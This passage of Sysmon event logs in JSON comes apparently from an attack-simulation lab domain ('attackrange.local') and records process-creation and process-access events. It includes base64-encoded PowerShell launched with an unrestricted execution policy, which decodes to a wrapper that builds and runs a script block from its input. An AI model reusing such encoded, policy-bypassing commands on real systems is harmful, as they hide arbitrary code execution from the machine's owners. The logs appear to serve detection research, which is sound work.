C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-001085560A00}\r\nParentProcessId: 3852\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.209","ProcessGuid":"{A837DB8D-032E-5F25-0000-00105B620A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-001085560A00}","ParentProcessId":"3852","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5403,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001085560A00}\r\nSourceProcessId: 3852\r\nSourceThreadId: 4568\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976daae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976da0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001085560A00}","SourceProcessId":"3852","SourceThreadId":"4568","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976daae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976da0b2(wow64)","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5404,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-00105B620A00}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-00105B620A00}","TargetProcessId":"796","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5405,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
